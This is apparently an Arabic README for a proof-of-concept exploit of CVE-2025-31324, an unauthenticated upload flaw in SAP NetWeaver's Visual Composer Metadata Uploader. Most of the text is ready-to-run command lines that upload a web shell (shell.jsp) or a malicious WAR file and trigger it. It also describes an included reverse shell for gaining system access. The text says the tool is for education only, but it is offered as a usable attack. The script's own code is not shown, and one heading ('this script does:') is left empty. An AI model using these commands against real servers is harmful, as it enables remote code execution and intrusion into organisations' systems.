
إثبات المفهوم لثغرة CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader
إثبات المفهوم لـ CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader
ينفّذ هذا السكربت:
مثال على الاستخدام:
python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal
python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https
لديك أيضًا إمكانية رفع ملف .war إذا كانت هذه هي الطريقة التي تريد التنفيذ بها. cache.jsp عبارة عن شل عكسي سيمنحك وصولًا بمجرد دخولك إلى النظام. (ما زلنا نعمل على حل بعض المشكلات هناك)
هذا الغرض منه تعليمي فقط ولا ينبغي استخدامه في أي أنشطة ضارة. تأكد دائمًا من حصولك على الأذونات اللازمة واتباع الإرشادات الأخلاقية عند اختبار الثغرات الأمنية أو البحث فيها.
لأي أسئلة أو توضيحات، لا تتردد في التواصل. ابقَ آمنًا ومحميًا!